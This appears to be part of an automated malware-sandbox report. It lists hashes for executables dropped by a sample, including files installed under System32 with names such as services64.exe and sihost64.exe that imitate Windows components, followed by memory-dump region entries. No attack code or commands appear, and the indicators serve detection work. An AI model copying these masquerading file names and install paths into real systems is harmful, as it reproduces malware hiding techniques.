a74d874e752dbe128a2974fb1a802f2b
SHA14adfe92f34383dd15ea2164d994727cbac2abb34
SHA256f08b14662ef8669c6401869d87fc39a95caba06a4f945bd2b090b3bf437b7c4f
SHA51203d915ba8b8b547bf4cf8cbceb24049a6a35e69da985284f34d44a6d97ac71477785eb5e575f41658a52d78aefa07d2aa6939307f9068cb3b938370fd31d59de
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
6d7513806f55812e6a0dcdfd44a057f0
SHA1f8e24fd529c0be20bcf32c26150ff387d2646cdd
SHA256a7166545461e17ce4ed30d5b22c94ce153d81e9c0c3c8fe22f94c43f1ef62b9b
SHA51262c9f1f41e0d78327ad041816d65017d95dde39b37f145a49a0f7582f660c51ec399ab07e097694a2a1b726516ba05f0eefddef1d16b0103e6d35a7bdfad259b
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exeMD5
3dddbab9fbf93ab3dbe8c3eebb783472
SHA1aa54ca975e692d541cd7b37054fbc343aba7906e
SHA256e6315f3eb516284f6bdbb69680f5a4ff2ab4ddc6f93e1937830cccbeaa99d038
SHA5128eae2168273a675725df6711dab6519e5787688268a7e9f0a5a80dd15bed77951619e274abb5d228b84bd527646b414e345781a4f8c743551b8532d9c6eaa5b8
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exeMD5
3dddbab9fbf93ab3dbe8c3eebb783472
SHA1aa54ca975e692d541cd7b37054fbc343aba7906e
SHA256e6315f3eb516284f6bdbb69680f5a4ff2ab4ddc6f93e1937830cccbeaa99d038
SHA5128eae2168273a675725df6711dab6519e5787688268a7e9f0a5a80dd15bed77951619e274abb5d228b84bd527646b414e345781a4f8c743551b8532d9c6eaa5b8
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeMD5
7066ed03efd072ba5c0d9479c4dd23c1
SHA1064dfe6c112b419a5822c2fc3d5cdcc296f76fae
SHA256fe528fc9917783284421b45f302fc62f5058d40a9156fabeed1f7771478b24c8
SHA512e0d9684809b32046ef115c1cdb851d00d0d31be6a79219e656b4c7a42ad690d1a6f60049a9589261e03198c07532db5ed1500128ab4c3c9f60c228c13d03e10b
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeMD5
7066ed03efd072ba5c0d9479c4dd23c1
SHA1064dfe6c112b419a5822c2fc3d5cdcc296f76fae
SHA256fe528fc9917783284421b45f302fc62f5058d40a9156fabeed1f7771478b24c8
SHA512e0d9684809b32046ef115c1cdb851d00d0d31be6a79219e656b4c7a42ad690d1a6f60049a9589261e03198c07532db5ed1500128ab4c3c9f60c228c13d03e10b
-
C:\Windows\System32\Microsoft\Libs\sihost64.exeMD5
ab0e8cd9d9374369b972868842a74471
SHA1d457b0f8ba1b3d1bd98fae16ea36a46ae04013a3
SHA256873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea
SHA51291d56a14ca18e316033cd938fbcdd48faa83ff8964185c2db9fbacdb200aab8c863c17c066f25e05afcd87746dc5909ecf59cfdb2920fb95528a5735d09c9afb
-
C:\Windows\System32\Microsoft\Telemetry\sihost32.exeMD5
5f4c60a6e2549d64a7d9e9c6053d385a
SHA123862358b97ea62cfb4dd5648b3e9b827e6886a4
SHA256145a18732aa1c09bf0a1e79193bed6c6d0fb51b7825c67828616fffe8d359e3d
SHA512a427ca2b789a07e332893e16ba1caaa9424fd03343d64288a0c1dab558a637f80f013aa0496a575630c39a395c6074791875be77450caab2189d88f6fbf99f2d
-
C:\Windows\System32\services32.exeMD5
3dddbab9fbf93ab3dbe8c3eebb783472
SHA1aa54ca975e692d541cd7b37054fbc343aba7906e
SHA256e6315f3eb516284f6bdbb69680f5a4ff2ab4ddc6f93e1937830cccbeaa99d038
SHA5128eae2168273a675725df6711dab6519e5787688268a7e9f0a5a80dd15bed77951619e274abb5d228b84bd527646b414e345781a4f8c743551b8532d9c6eaa5b8
-
C:\Windows\System32\services64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Windows\system32\Microsoft\Libs\sihost64.exeMD5
ab0e8cd9d9374369b972868842a74471
SHA1d457b0f8ba1b3d1bd98fae16ea36a46ae04013a3
SHA256873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea
SHA51291d56a14ca18e316033cd938fbcdd48faa83ff8964185c2db9fbacdb200aab8c863c17c066f25e05afcd87746dc5909ecf59cfdb2920fb95528a5735d09c9afb
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exeMD5
5f4c60a6e2549d64a7d9e9c6053d385a
SHA123862358b97ea62cfb4dd5648b3e9b827e6886a4
SHA256145a18732aa1c09bf0a1e79193bed6c6d0fb51b7825c67828616fffe8d359e3d
SHA512a427ca2b789a07e332893e16ba1caaa9424fd03343d64288a0c1dab558a637f80f013aa0496a575630c39a395c6074791875be77450caab2189d88f6fbf99f2d
-
C:\Windows\system32\services32.exeMD5
3dddbab9fbf93ab3dbe8c3eebb783472
SHA1aa54ca975e692d541cd7b37054fbc343aba7906e
SHA256e6315f3eb516284f6bdbb69680f5a4ff2ab4ddc6f93e1937830cccbeaa99d038
SHA5128eae2168273a675725df6711dab6519e5787688268a7e9f0a5a80dd15bed77951619e274abb5d228b84bd527646b414e345781a4f8c743551b8532d9c6eaa5b8
-
C:\Windows\system32\services64.exeMD5
f87ec0d92f1e1c57e281c3b7207264a4
SHA1452ee705af24c36bb2235fc969dd122ede448e7b
SHA2565e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
SHA5128e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
memory/584-400-0x0000000000000000-mapping.dmp
-
memory/1056-362-0x0000000000000000-mapping.dmp
-
memory/1352-165-0x000001C1EA7F0000-0x000001C1EA9DE000-memory.dmpFilesize
1.9MB
-
memory/1352-173-0x000001C1E9D00000-0x000001C1E9D02000-memory.dmpFilesize
8KB
-
memory/1352-172-0x000001C1E9DF6000-0x000001C1E9DF7000-memory.dmpFilesize
4KB
-
memory/1352-171-0x000001C1E9DF3000-0x000001C1E9DF5000-memory.dmpFilesize
8KB
-
memory/1352-169-0x000001C1E7EF0000-0x000001C1E80E2000-memory.dmpFilesize
1.9MB
-
memory/1352-170-0x000001C1E9DF0000-0x000001C1E9DF2000-memory.dmpFilesize
8KB
-
memory/1352-168-0x000001C1E9D70000-0x000001C1E9D71000-memory.dmpFilesize
4KB
-
memory/1352-167-0x000001C1E9D00000-0x000001C1E9D02000-memory.dmpFilesize
8KB
-
memory/1352-164-0x000001C1E9D00000-0x000001C1E9D02000-memory.dmpFilesize
8KB
-
memory/1352-163-0x000001C1E9D00000-0x000001C1E9D02000-memory.dmpFilesize
8KB
-
memory/1352-162-0x000001C1E9D00000-0x000001C1E9D02000-memory.dmpFilesize
8KB
-
memory/1352-161-0x000001C1E9D00000-0x000001C1E9D02000-memory.dmpFilesize
8KB
-
memory/1412-357-0x0000000000000000-mapping.dmp
-
memory/1524-576-0x00000266422B6000-0x00000266422B8000-memory.dmpFilesize
8KB
-
memory/1524-538-0x00000266422B3000-0x00000266422B5000-memory.dmpFilesize
8KB
-
memory/1524-580-0x00000266422B8000-0x00000266422B9000-memory.dmpFilesize
4KB
-
memory/1524-536-0x00000266422B0000-0x00000266422B2000-memory.dmpFilesize
8KB
-
memory/1524-515-0x0000000000000000-mapping.dmp
-
memory/1604-592-0x0000017620DF0000-0x0000017620DF2000-memory.dmpFilesize
8KB
-
memory/1604-594-0x0000017620DF6000-0x0000017620DF7000-memory.dmpFilesize
4KB
-
memory/1604-593-0x0000017620DF3000-0x0000017620DF5000-memory.dmpFilesize
8KB
-
memory/1604-591-0x000001761F210000-0x000001761F216000-memory.dmpFilesize
24KB
-
memory/1828-129-0x0000000000000000-mapping.dmp
-
memory/1828-142-0x0000000000A60000-0x0000000000A79000-memory.dmpFilesize
100KB
-
memory/1828-152-0x0000000005870000-0x0000000005871000-memory.dmpFilesize
4KB
-
memory/1828-148-0x0000000005090000-0x0000000005091000-memory.dmpFilesize
4KB
-
memory/1828-159-0x0000000007120000-0x0000000007121000-memory.dmpFilesize
4KB
-
memory/1828-145-0x00000000050D0000-0x00000000050D1000-memory.dmpFilesize
4KB
-
memory/1828-147-0x00000000050D3000-0x00000000050D4000-memory.dmpFilesize
4KB
-
memory/1828-146-0x00000000050D2000-0x00000000050D3000-memory.dmpFilesize
4KB
-
memory/1828-144-0x00000000050E0000-0x00000000050E1000-memory.dmpFilesize
4KB
-
memory/1828-154-0x0000000005F10000-0x0000000005F11000-memory.dmpFilesize
4KB
-
memory/1828-136-0x0000000000470000-0x000000000049E000-memory.dmpFilesize
184KB
-
memory/1828-160-0x00000000072F0000-0x00000000072F1000-memory.dmpFilesize
4KB
-
memory/1828-150-0x0000000005800000-0x0000000005801000-memory.dmpFilesize
4KB
-
memory/1828-155-0x00000000067C0000-0x00000000067C1000-memory.dmpFilesize
4KB
-
memory/1828-157-0x00000000069B0000-0x00000000069B1000-memory.dmpFilesize
4KB
-
memory/1828-151-0x00000000050D4000-0x00000000050D5000-memory.dmpFilesize
4KB
-
memory/1828-158-0x00000000070C0000-0x00000000070C1000-memory.dmpFilesize
4KB
-
memory/1828-149-0x00000000056F0000-0x00000000056F1000-memory.dmpFilesize
4KB
-
memory/1912-174-0x0000000000000000-mapping.dmp
-
memory/2036-441-0x0000020318D10000-0x0000020318D12000-memory.dmpFilesize
8KB
-
memory/2036-442-0x0000020318D13000-0x0000020318D15000-memory.dmpFilesize
8KB
-
memory/2036-443-0x0000020318D16000-0x0000020318D17000-memory.dmpFilesize
4KB
-
memory/2228-367-0x0000000000000000-mapping.dmp
-
memory/2272-301-0x000001BAE8F58000-0x000001BAE8F59000-memory.dmpFilesize
4KB
-
memory/2272-181-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmpFilesize
8KB
-
memory/2272-185-0x000001BAE9A20000-0x000001BAE9A21000-memory.dmpFilesize
4KB
-
memory/2272-183-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmpFilesize
8KB
-
memory/2272-175-0x0000000000000000-mapping.dmp
-
memory/2272-187-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmpFilesize
8KB
-
memory/2272-191-0x000001BAE8F50000-0x000001BAE8F52000-memory.dmpFilesize
8KB
-
memory/2272-176-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmpFilesize
8KB
-
memory/2272-182-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmpFilesize
8KB
-
memory/2272-192-0x000001BAE8F53000-0x000001BAE8F55000-memory.dmpFilesize
8KB
-
memory/2272-180-0x000001BAE8EC0000-0x000001BAE8EC1000-memory.dmpFilesize
4KB
-
memory/2272-179-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmpFilesize
8KB
-
memory/2272-194-0x000001BAE8F56000-0x000001BAE8F58000-memory.dmpFilesize
8KB
-
memory/2272-178-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmpFilesize
8KB
-
memory/2272-177-0x000001BAE6FD0000-0x000001BAE6FD2000-memory.dmpFilesize
8KB
-
memory/2312-606-0x0000018196D53000-0x0000018196D55000-memory.dmpFilesize
8KB
-
memory/2312-607-0x0000018196D56000-0x0000018196D57000-memory.dmpFilesize
4KB
-
memory/2312-222-0x0000000000000000-mapping.dmp
-
memory/2312-605-0x0000018196D50000-0x0000018196D52000-memory.dmpFilesize
8KB
-
memory/2312-604-0x0000018195250000-0x0000018195256000-memory.dmpFilesize
24KB
-
memory/2412-302-0x000001516A040000-0x000001516A042000-memory.dmpFilesize
8KB
-
memory/2412-304-0x000001516A043000-0x000001516A045000-memory.dmpFilesize
8KB
-
memory/2412-268-0x0000000000000000-mapping.dmp
-
memory/2412-310-0x000001516A046000-0x000001516A048000-memory.dmpFilesize
8KB
-
memory/2412-352-0x000001516A048000-0x000001516A049000-memory.dmpFilesize
4KB
-
memory/2836-184-0x0000000000000000-mapping.dmp
-
memory/2884-440-0x0000000000000000-mapping.dmp
-
memory/2904-276-0x0000000000000000-mapping.dmp
-
memory/2904-353-0x00000180DC188000-0x00000180DC189000-memory.dmpFilesize
4KB
-
memory/2904-351-0x00000180DC186000-0x00000180DC188000-memory.dmpFilesize
8KB
-
memory/2904-308-0x00000180DC183000-0x00000180DC185000-memory.dmpFilesize
8KB
-
memory/2904-306-0x00000180DC180000-0x00000180DC182000-memory.dmpFilesize
8KB
-
memory/3196-132-0x0000000000401000-0x0000000000403000-memory.dmpFilesize
8KB
-
memory/3196-126-0x0000000000000000-mapping.dmp
-
memory/3196-133-0x0000000000400000-0x0000000000EAE000-memory.dmpFilesize
10.7MB
-
memory/3208-402-0x000001892E5E3000-0x000001892E5E5000-memory.dmpFilesize
8KB
-
memory/3208-382-0x0000000000000000-mapping.dmp
-
memory/3208-444-0x000001892E5E8000-0x000001892E5E9000-memory.dmpFilesize
4KB
-
memory/3208-401-0x000001892E5E0000-0x000001892E5E2000-memory.dmpFilesize
8KB
-
memory/3208-438-0x000001892E5E6000-0x000001892E5E8000-memory.dmpFilesize
8KB
-
memory/3212-186-0x0000000000000000-mapping.dmp
-
memory/3252-354-0x0000000000000000-mapping.dmp
-
memory/3812-381-0x0000000000000000-mapping.dmp
-
memory/4060-125-0x0000000000400000-0x0000000000E48000-memory.dmpFilesize
10.3MB
-
memory/4060-124-0x0000000000401000-0x0000000000403000-memory.dmpFilesize
8KB
-
memory/4060-121-0x0000000000000000-mapping.dmp
-
memory/4080-398-0x000001D3F7B53000-0x000001D3F7B55000-memory.dmpFilesize
8KB
-
memory/4080-399-0x000001D3F7B56000-0x000001D3F7B57000-memory.dmpFilesize
4KB
-
memory/4080-397-0x000001D3F7B50000-0x000001D3F7B52000-memory.dmpFilesize
8KB
-
memory/4144-298-0x000001F754418000-0x000001F754419000-memory.dmpFilesize
4KB
-
memory/4144-231-0x000001F754413000-0x000001F754415000-memory.dmpFilesize
8KB
-
memory/4144-226-0x000001F754410000-0x000001F754412000-memory.dmpFilesize
8KB
-
memory/4144-264-0x000001F754416000-0x000001F754418000-memory.dmpFilesize
8KB
-
memory/4144-219-0x0000000000000000-mapping.dmp
-
memory/4220-608-0x000001187CE40000-0x000001187CE60000-memory.dmpFilesize
128KB
-
memory/4220-542-0x000001187CE20000-0x000001187CE40000-memory.dmpFilesize
128KB
-
memory/4220-491-0x000000014030F3F8-mapping.dmp
-
memory/4220-496-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/4320-445-0x0000000000000000-mapping.dmp
-
memory/4320-497-0x0000028BDED58000-0x0000028BDED59000-memory.dmpFilesize
4KB
-
memory/4320-483-0x0000028BDED53000-0x0000028BDED55000-memory.dmpFilesize
8KB
-
memory/4320-482-0x0000028BDED50000-0x0000028BDED52000-memory.dmpFilesize
8KB
-
memory/4320-484-0x0000028BDED56000-0x0000028BDED58000-memory.dmpFilesize
8KB
-
memory/4392-117-0x0000000077580000-0x000000007770E000-memory.dmpFilesize
1.6MB
-
memory/4392-135-0x0000000006BE0000-0x0000000006BE1000-memory.dmpFilesize
4KB
-
memory/4392-118-0x0000000000FA0000-0x0000000000FA1000-memory.dmpFilesize
4KB
-
memory/4392-120-0x0000000005C60000-0x0000000005C61000-memory.dmpFilesize
4KB
-
memory/4392-134-0x0000000006FF0000-0x0000000006FF1000-memory.dmpFilesize
4KB
-
memory/4712-197-0x00000178DDFF0000-0x00000178DE20E000-memory.dmpFilesize
2.1MB
-
memory/4712-189-0x00000178C3AB0000-0x00000178C3AB2000-memory.dmpFilesize
8KB
-
memory/4712-196-0x00000178C3AB0000-0x00000178C3AB2000-memory.dmpFilesize
8KB
-
memory/4712-230-0x00000178C55B6000-0x00000178C55B7000-memory.dmpFilesize
4KB
-
memory/4712-229-0x00000178C55B3000-0x00000178C55B5000-memory.dmpFilesize
8KB
-
memory/4712-195-0x00000178C3610000-0x00000178C3832000-memory.dmpFilesize
2.1MB
-
memory/4712-224-0x00000178C55B0000-0x00000178C55B2000-memory.dmpFilesize
8KB
-
memory/4712-193-0x00000178C3AB0000-0x00000178C3AB2000-memory.dmpFilesize
8KB
-
memory/4712-190-0x00000178C3AB0000-0x00000178C3AB2000-memory.dmpFilesize
8KB
-
memory/4712-203-0x00000178C3AB0000-0x00000178C3AB2000-memory.dmpFilesize
8KB
-
memory/4712-200-0x00000178C3AB0000-0x00000178C3AB2000-memory.dmpFilesize
8KB
-
memory/4748-501-0x0000000000000000-mapping.dmp
-
memory/4748-574-0x00000207BB398000-0x00000207BB399000-memory.dmpFilesize
4KB
-
memory/4748-539-0x00000207BB396000-0x00000207BB398000-memory.dmpFilesize
8KB
-
memory/4748-507-0x00000207BB393000-0x00000207BB395000-memory.dmpFilesize
8KB
-
memory/4748-506-0x00000207BB390000-0x00000207BB392000-memory.dmpFilesize
8KB
-
memory/4788-236-0x0000000000000000-mapping.dmp
-
memory/4968-204-0x0000000000000000-mapping.dmp
-
memory/5044-460-0x0000000000000000-mapping.dmp